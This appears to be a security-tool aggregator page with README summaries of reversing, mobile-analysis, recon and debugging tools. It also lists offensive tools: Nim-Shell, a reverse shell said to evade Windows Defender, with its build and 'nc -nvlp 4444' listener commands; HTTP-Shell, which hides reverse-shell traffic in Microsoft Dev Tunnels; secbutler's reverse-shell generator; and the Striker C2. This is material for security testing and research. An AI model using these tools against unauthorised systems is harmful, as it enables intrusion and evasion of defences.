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Before yesterdayKitPloit - PenTest Tools!

Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

By: Zion3R

This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.


  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z

Noia - Simple Mobile Applications Sandbox File Browser Tool

By: Zion3R

Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.

Installation & Usage

npm install -g noia


  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia

Device setup:

Noia is powered by, thus requires Frida to run.

Rooted Device

See: * *

Non-rooted Device


Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.



Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application

By: Zion3R

Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.

How work?

The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.



Search files:


React Native Android & iOS

Search file

Andorid files:

iOS files:



❗A minimum of Java 8 is required to run Apktool.

pip install -r requirements.txt


python3 app.apk|ipa|aab

python3 file.apk

[+] App was written in React Native

Do you want analizy the application (y/n) y

Output directory already exists. Skipping decompilation.

Beauty the react code? (y/n) n

Search any info? (y/n) y

==>>Searching possible internal IPs in the file


==>>Searching possible emails in the file


==>>Searching possible interesting words in the file


==>>Searching Private Keys in the file


==>>Searching high confidential secrets


==>>Searching possible sensitive URLs in js files


==>>Searching possible endpoints in js files results.........


This tool uses Apktool for decompilation of Android applications.

This tool renames the .ipa file of iOS applications to .zip and extracts the contents.

Feature Note Cordova React Native Native JavaScript Flutter Xamarin
JavaScript beautifier Use this for the first few occasions to see better results. βœ… βœ… βœ…
Identifying multiple sensitive information IPs, Private Keys, API Keys, Emails, URLs βœ… βœ… βœ… ❌
Cryptographic Functions βœ… βœ… βœ… ❌ ❌
Endpoint extractor βœ… βœ… βœ… ❌ ❌
Automatically detects if the code has been beautified. ❌ ❌ ❌
Extracts automatically apk of devices/emulator ❌ ❌ ❌ ❌ ❌
Patching apk βœ…
Extract an APK from a bundle file. βœ… βœ… βœ… βœ… βœ…
Detect if JS files are encrypted ❌ ❌
Detect if the resources are compressed. ❌ Hermesβœ… ❌ ❌ XALZβœ…
Detect if the app is split ❌ ❌ ❌ ❌ ❌

What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.

More information:

Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.

Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.

adb shell pm path com.package

For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains

  • This tool use a secrets-patterns-db repositorty created by mazen160
  • This tool use a regular expresion created by Gerben_Javado for extract endpoints
  • This tools use reflutter for flutter actions


  • Public release
  • Bug fixes

  • Added plugins information in Cordova apps
  • Added Xamarin actions
  • Added NativeScript actions
  • Bug fixes

  • Added NativeScript app detection
  • Added signing option when the apk extracted of aab file is not signed

  • Fixed issues with commands on Linux.

  • Initial version release.

  • This work is licensed under a Creative Commons Attribution 4.0 International License.


Cesar Calderon Marco Almaguer

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!

  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /

v0.1.9 -

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.


Run the following command to install the latest version:

go install

Or you can simply grab an executable from the Releases page.


secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.

Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R

Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install


Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

VAR_NAME: value
# Add more variables...

parallel: true|false
- name: task-name
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

- name: example-task
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.


Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

ORG: ""
OUTPUT_DIR: "results"

- name: example-task
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
- name: reverse-whois
silent: false
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.


Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!


Inspiration of this project comes from Awesome taskfile project.

Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

By: Zion3R

Reverse shell that can bypass windows defender detection

$ apt install nim


nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.

and listen

 $ nc -nvlp 4444

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.

Search for c2 servers based on netlas (8)


To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t -p 443 -s 1234567890abcdef


To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>


To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \


To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.


Name Support
Metasploit βœ…
Havoc ❓
Cobalt Strike βœ…
Bruteratel βœ…
Sliver βœ…
DeimosC2 βœ…
PhoenixC2 βœ…
Empire ❌
Merlin βœ…
Covenant ❌
Villain βœ…
Shad0w ❌
PoshC2 βœ…


  • βœ… - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support


If you'd like to contribute to this project, please feel free to create a pull request.


This project is licensed under the License - see the LICENSE file for details.

Bread - BIOS Reverse Engineering And Advanced Debugging

By: Zion3R

BREAD (BIOS Reverse Engineering & Advanced Debugging) is an 'injectable' real-mode x86 debugger that can debug arbitrary real-mode code (on real HW) from another PC via serial cable.


BREAD emerged from many failed attempts to reverse engineer legacy BIOS. Given that the vast majority -- if not all -- BIOS analysis is done statically using disassemblers, understanding the BIOS becomes extremely difficult, since there's no way to know the value of registers or memory in a given piece of code.

Despite this, BREAD can also debug arbitrary code in real-mode, such as bootable code or DOS programs too.

How it works?

This debugger is divided into two parts: the debugger (written entirely in assembly and running on the hardware being debugged) and the bridge, written in C and running on Linux.

The debugger is the injectable code, written in 16-bit real-mode, and can be placed within the BIOS ROM or any other real-mode code. When executed, it sets up the appropriate interrupt handlers, puts the processor in single-step mode, and waits for commands on the serial port.

The bridge, on the other hand, is the link between the debugger and GDB. The bridge communicates with GDB via TCP and forwards the requests/responses to the debugger through the serial port. The idea behind the bridge is to remove the complexity of GDB packets and establish a simpler protocol for communicating with the machine. In addition, the simpler protocol enables the final code size to be smaller, making it easier for the debugger to be injectable into various different environments.

As shown in the following diagram:

    +---------+ simple packets +----------+   GDB packets  +---------+                                       
| |--------------->| |--------------->| |
| dbg | | bridge | | gdb |
|(real HW)|<---------------| (Linux) |<---------------| (Linux) |
+---------+ serial +----------+ TCP +---------+


By implementing the GDB stub, BREAD has many features out-of-the-box. The following commands are supported:

  • Read memory (via x, dump, find, and relateds)
  • Write memory (via set, restore, and relateds)
  • Read and write registers
  • Single-Step (si, stepi) and continue (c, continue)
  • Breakpoints (b, break)1
  • Hardware Watchpoints (watch and its siblings)2


How many? Yes. Since the code being debugged is unaware that it is being debugged, it can interfere with the debugger in several ways, to name a few:

  • Protected-mode jump: If the debugged code switches to protected-mode, the structures for interrupt handlers, etc. are altered and the debugger will no longer be invoked at that point in the code. However, it is possible that a jump back to real mode (restoring the full previous state) will allow the debugger to work again.

  • IDT changes: If for any reason the debugged code changes the IDT or its base address, the debugger handlers will not be properly invoked.

  • Stack: BREAD uses a stack and assumes it exists! It should not be inserted into locations where the stack has not yet been configured.

For BIOS debugging, there are other limitations such as: it is not possible to debug the BIOS code from the very beggining (bootblock), as a minimum setup (such as RAM) is required for BREAD to function correctly. However, it is possible to perform a "warm-reboot" by setting CS:EIP to F000:FFF0. In this scenario, the BIOS initialization can be followed again, as BREAD is already properly loaded. Please note that the "code-path" of BIOS initialization during a warm-reboot may be different from a cold-reboot and the execution flow may not be exactly the same.


Building only requires GNU Make, a C compiler (such as GCC, Clang, or TCC), NASM, and a Linux machine.

The debugger has two modes of operation: polling (default) and interrupt-based:

Polling mode

Polling mode is the simplest approach and should work well in a variety of environments. However, due the polling nature, there is a high CPU usage:


$ git clone
$ cd BREAD/
$ make

Interrupt-based mode

The interrupt-based mode optimizes CPU utilization by utilizing UART interrupts to receive new data, instead of constantly polling for it. This results in the CPU remaining in a 'halt' state until receiving commands from the debugger, and thus, preventing it from consuming 100% of the CPU's resources. However, as interrupts are not always enabled, this mode is not set as the default option:


$ git clone
$ cd BREAD/
$ make UART_POLLING=no


Using BREAD only requires a serial cable (and yes, your motherboard has a COM header, check the manual) and injecting the code at the appropriate location.

To inject, minimal changes must be made in dbg.asm (the debugger's src). The code's 'ORG' must be changed and also how the code should return (look for ">> CHANGE_HERE <<" in the code for places that need to be changed).

For BIOS (e.g., AMI Legacy):

Using an AMI legacy as an example, where the debugger module will be placed in the place of the BIOS logo (0x108200 or FFFF:8210) and the following instructions in the ROM have been replaced with a far call to the module:

00017EF2 06 push es
00017EF3 1E push ds
00017EF4 07 pop es
00017EF5 8BD8 mov bx,ax -┐ replaced by: call 0xFFFF:0x8210 (dbg.bin)
00017EF7 B8024F mov ax,0x4f02 -β”˜
00017EFA CD10 int 0x10
00017EFC 07 pop es
00017EFD C3 ret

the following patch is sufficient:

diff --git a/dbg.asm b/dbg.asm
index caedb70..88024d3 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,7 @@

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x8210] ; >> CHANGE_HERE <<

%include ""

@@ -140,8 +140,8 @@ _start:

; Overwritten BIOS instructions below (if any)
- nop
- nop
+ mov ax, 0x4F02
+ int 0x10

It is important to note that if you have altered a few instructions within your ROM to invoke the debugger code, they must be restored prior to returning from the debugger.

The reason for replacing these two instructions is that they are executed just prior to the BIOS displaying the logo on the screen, which is now the debugger, ensuring a few key points:

  • The logo module (which is the debugger) has already been loaded into memory
  • Video interrupts from the BIOS already work
  • The code around it indicates that the stack already exists

Finding a good location to call the debugger (where the BIOS has already initialized enough, but not too late) can be challenging, but it is possible.

After this, dbg.bin is ready to be inserted into the correct position in the ROM.


Debugging DOS programs with BREAD is a bit tricky, but possible:

1. Edit dbg.asm so that DOS understands it as a valid DOS program:

  • Set the ORG to 0x100
  • Leave the useful code away from the beginning of the file (times)
  • Set the program output (int 0x20)

The following patch addresses this:

diff --git a/dbg.asm b/dbg.asm
index caedb70..b042d35 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,10 @@

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x100]
+times 40*1024 db 0x90 ; keep some distance,
+ ; 40kB should be enough

%include ""

@@ -140,7 +143,7 @@ _start:

; Overwritten BIOS instructions below (if any)
- nop
+ int 0x20 ; DOS interrupt to exit process

2. Create a minimal bootable DOS environment and run

Create a bootable FreeDOS (or DOS) floppy image containing just the kernel and the terminal: KERNEL.SYS and COMMAND.COM. Also add to this floppy image the program to be debugged and the DBG.COM (dbg.bin).

The following steps should be taken after creating the image:

  • Boot it with bridge already opened (refer to the next section for instructions).
  • Execute DBG.COM.
  • Once execution stops, use GDB to add any desired breakpoints and watchpoints relative to the next process you want to debug. Then, allow the DBG.COM process to continue until it finishes.
  • Run the process that you want to debug. The previously-configured breakpoints and watchpoints should trigger as expected.

It is important to note that DOS does not erase the process image after it exits. As a result, the debugger can be configured like any other DOS program and the appropriate breakpoints can be set. The beginning of the debugger is filled with NOPs, so it is anticipated that the new process will not overwrite the debugger's memory, allowing it to continue functioning even after it appears to be "finished". This allows BREaD to debug other programs, including DOS itself.


Bridge is the glue between the debugger and GDB and can be used in different ways, whether on real hardware or virtual machine.

Its parameters are:

Usage: ./bridge [options]
-s Enable serial through socket, instead of device
-d <path> Replaces the default device path (/dev/ttyUSB0)
(does not work if -s is enabled)
-p <port> Serial port (as socket), default: 2345
-g <port> GDB port, default: 1234
-h This help

If no options are passed the default behavior is:
./bridge -d /dev/ttyUSB0 -g 1234

Minimal recommended usages:
./bridge -s (socket mode, serial on 2345 and GDB on 1234)
./bridge (device mode, serial on /dev/ttyUSB0 and GDB on 1234)

Real hardware

To use it on real hardware, just invoke it without parameters. Optionally, you can change the device path with the -d parameter:

Execution flow:
  1. Connect serial cable to PC
  2. Run bridge (./bridge or ./bridge -d /path/to/device)
  3. Turn on the PC to be debugged
  4. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

Virtual machine

For use in a virtual machine, the execution order changes slightly:

Execution flow:
  1. Run bridge (./bridge or ./bridge -d /path/to/device)
  2. Open the VM3 (such as: make bochs or make qemu)
  3. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

In both cases, be sure to run GDB inside the BRIDGE root folder, as there are auxiliary files in this folder for GDB to work properly in 16-bit.


BREAD is always open to the community and willing to accept contributions, whether with issues, documentation, testing, new features, bugfixes, typos, and etc. Welcome aboard.

License and Authors

BREAD is licensed under MIT License. Written by Davidson Francis and (hopefully) other contributors.


  1. Breakpoints are implemented as hardware breakpoints and therefore have a limited number of available breakpoints. In the current implementation, only 1 active breakpoint at a time! ↩

  2. Hardware watchpoints (like breakpoints) are also only supported one at a time. ↩

  3. Please note that debug registers do not work by default on VMs. For bochs, it needs to be compiled with the --enable-x86-debugger=yes flag. For Qemu, it needs to run with KVM enabled: --enable-kvm (make qemu already does this). ↩

Sekiryu - Comprehensive Toolkit For Ghidra Headless

By: Zion3R

This Ghidra Toolkit is a comprehensive suite of tools designed to streamline and automate various tasks associated with running Ghidra in Headless mode. This toolkit provides a wide range of scripts that can be executed both inside and alongside Ghidra, enabling users to perform tasks such as Vulnerability Hunting, Pseudo-code Commenting with ChatGPT and Reporting with Data Visualization on the analyzed codebase. It allows user to load and save their own script and interract with the built-in API of the script.

Key Features

  • Headless Mode Automation: The toolkit enables users to seamlessly launch and run Ghidra in Headless mode, allowing for automated and batch processing of code analysis tasks.

  • Script Repository/Management: The toolkit includes a repository of pre-built scripts that can be executed within Ghidra. These scripts cover a variety of functionalities, empowering users to perform diverse analysis and manipulation tasks. It allows users to load and save their own scripts, providing flexibility and customization options for their specific analysis requirements. Users can easily manage and organize their script collection.

  • Flexible Input Options: Users can utilize the toolkit to analyze individual files or entire folders containing multiple files. This flexibility enables efficient analysis of both small-scale and large-scale codebases.

Available scripts

  • Vulnerability Hunting with pattern recognition: Leverage the toolkit's scripts to identify potential vulnerabilities within the codebase being analyzed. This helps security researchers and developers uncover security weaknesses and proactively address them.
  • Vulnerability Hunting with SemGrep: Thanks to the security Researcher 0xdea and the rule-set they created, we can use simple rules and SemGrep to detect vulnerabilities in C/C++ pseudo code (their github:
  • Automatic Pseudo Code Generating: Automatically generate pseudo code within Ghidra's Headless mode. This feature assists in understanding and documenting the code logic without manual intervention.
  • Pseudo-code Commenting with ChatGPT: Enhance the readability and understanding of the codebase by utilizing ChatGPT to generate human-like comments for pseudo-code snippets. This feature assists in documenting and explaining the code logic.
  • Reporting and Data Visualization: Generate comprehensive reports with visualizations to summarize and present the analysis results effectively. The toolkit provides data visualization capabilities to aid in identifying patterns, dependencies, and anomalies in the codebase.


Before using this project, make sure you have the following software installed:


  • Install the pre-requisites mentionned above.
  • Download Sekiryu release directly from Github or use: pip install sekiryu.


In order to use the script you can simply run it against a binary with the options that you want to execute.

  • sekiryu [-F FILE][OPTIONS]

Please note that performing a binary analysis with Ghidra (or any other product) is a relatively slow process. Thus, expect the binary analysis to take several minutes depending on the host performance. If you run Sekiryu against a very large application or a large amount of binary files, be prepared to WAIT



In order to use it the User must import xmlrpc in their script and call the function like for example: proxy.send_data


  • send_data() - Allows user to send data to the server. ("data" is a Dictionnary)
  • recv_data() - Allows user to receive data from the server. ("data" is a Dictionnary)
  • request_GPT() - Allows user to send string data via ChatGPT API.

Use your own scripts

Scripts are saved in the folder /modules/scripts/ you can simply copy your script there. In the file you can find the following function which is responsible to run a headless ghidra script:

def exec_headless(file, script):
Execute the headless analysis of ghidra
path = ghidra_path + 'analyzeHeadless'
# Setting variables
tmp_folder = "/tmp/out"
cmd = ' ' + tmp_folder + ' TMP_DIR -import'+ ' '+ file + ' '+ "-postscript "+ script +" -deleteProject"

# Running ghidra with specified file and script
p =[str(path + cmd)], shell=True, capture_output=True)

except KeyError as e:

The usage is pretty straight forward, you can create your own script then just add a function in the such as:

def yourfunction(file):
# Setting script
script = "modules/scripts/"

# Start the exec_headless function in a new thread
thread = threading.Thread(target=exec_headless, args=(file, script))
except Exception as e:

The file is responsible for the command-line-interface and allows you to add argument and command associated like this:

analysis_parser.add_argument('[-ShortCMD]', '[--LongCMD]', help="Your Help Message", action="store_true")


  • Scripts/SCRIPTS/SCRIIIIIPTS: This tool is designed to be a toolkit allowing user to save and run their own script easily, obviously if you can contribue in any sort of script (anything that is interesting will be approved !)
  • Optimization: Any kind of optimization are welcomed and will almost automically be approved and deployed every release, some nice things could be: improve parallel tasking, code cleaning and overall improvement.
  • Malware analysis: It's a big part, which i'm not familiar with. Any malware analyst willing to contribute can suggest idea, script, or even commit code directly in the project.
  • Reporting: I ain't no data visualization engineer, if anyone is willing to improve/contribue on this part, it'll be very nice.


The xmlrpc.server module is not secure against maliciously constructed data. If you need to parse 
untrusted or unauthenticated data see XML vulnerabilities.

Special thanks

A lot of people encouraged me to push further on this tool and improve it. Without you all this project wouldn't have been
the same so it's time for a proper shout-out:
- @JeanBedoul @McProustinet @MilCashh @Aspeak @mrjay @Esbee|sandboxescaper @Rosen @Cyb3rops @RussianPanda @Dr4k0nia
- @Inversecos @Vs1m @djinn @corelanc0d3r @ramishaath @chompie1337
Thanks for your feedback, support, encouragement, test, ideas, time and care.

For more information about Bushido Security, please visit our website:

HTTP-Shell - MultiPlatform HTTP Reverse Shell

By: Zion3R

HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.

This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.


  • Python 3 for Server
  • Install requirements.txt
  • Bash for Linux Client
  • PowerShell 4.0 or greater for Windows Client


It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone


The detailed guide of use can be found at the following link:


This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog

Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

By: Zion3R

A Pin Tool for tracing:

Bypasses the anti-tracing check based on RDTSC.

Generates a report in a .tag format (which can be loaded into other analysis tools):

RVA;traced event


345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress

How to build

On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer for more information. Detailed description available here.


ο“– Details about the usage you will find on the project's Wiki.


  • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
  • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
  • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.

Questions? Ideas? Join Discussions!

PurpleOps - An Open-Source Self-Hosted Purple Team Management Web Application

By: Zion3R

An open-source self-hosted purple team management web application.

Key Features

  • Template engagements and testcases
  • Framework friendly
  • Role-based Access Control & MFA
  • Inbuilt DOCX reporting + custom template support

How PurpleOps is different:

  • No attribution needed
  • Hackable, no "no-reversing" clauses
  • No over complications with tomcat, redis, manual database transplanting and an obtuce permission model


mongodb -d -p 27017:27017 mongo $ pip3 install -r requirements.txt $ python3 $ python3" dir="auto">
# Clone this repository
$ git clone

# Go into the repository
$ cd PurpleOps

# Alter PurpleOps settings (if you want to customize anything but should work out the box)
$ nano .env

# Run the app with docker
$ sudo docker compose up

# PurpleOps should now by available on http://localhost:5000, it is recommended to add a reverse proxy such as nginx or Apache in front of it if you want to expose this to the outside world.

# Alternatively
$ sudo docker run --name mongodb -d -p 27017:27017 mongo
$ pip3 install -r requirements.txt
$ python3
$ python3

Contact Us

We would love to hear back from you, if something is broken or have and idea to make it better add a ticket or ping us | @_w_m__


KoodousFinder - A Simple Tool To Allows Users To Search For And Analyze Android Apps For Potential Security Threats And Vulnerabilities

By: Zion3R

A simple tool to allows users to search for and analyze android apps for potential security threats and vulnerabilities

Account and API Key

Create a Koodous account and get your api key


$ pip install koodousfinder


Param description
-h, --help 'Show this help message and exit'
--package-name "General search for APKs"`
--app-name Name of the app to search for

Examples --package-name "app: Brata AND package: com.brata" --package-name "package: AND trusted: true" --package-name "com.metasploit"
python3 --app-name "WhatsApp MOD"

Modifiers for advanced search

Attribute Modifier Description
Hash hash: Performs the search depending on the automatically inserted hash. The admitted hashes are sha1, sha256 and md5.
App name app: Searches for the specified app name. If it is a compound name, it can be searched enclosed in quotes, for example: app: "Whatsapp premium".
Package name. package: Searches the package name to see if it contains the indicated string, for example: package: com.whatsapp.
Name of the developer or company. developer: Searches whether the company or developer field includes the indicated string, for example: developer: "WhatsApp Inc.".
Certificate certificate: Searches the apps by their certificate. For example: cert: 60BBF1896747E313B240EE2A54679BB0CE4A5023 or certificate: 38A0F7D505FE18FEC64FBF343ECAAAF310DBD799.

More information:

  • Discord Integration
  • Rulesets view

Striker - A Command And Control (C2)

Striker is a simple Command and Control (C2) program.


This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.


A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Aynchronous tasks execution.
  • Support for multiple redirectors, and can fallback to others when active one goes down.

B) Backend / Teamserver

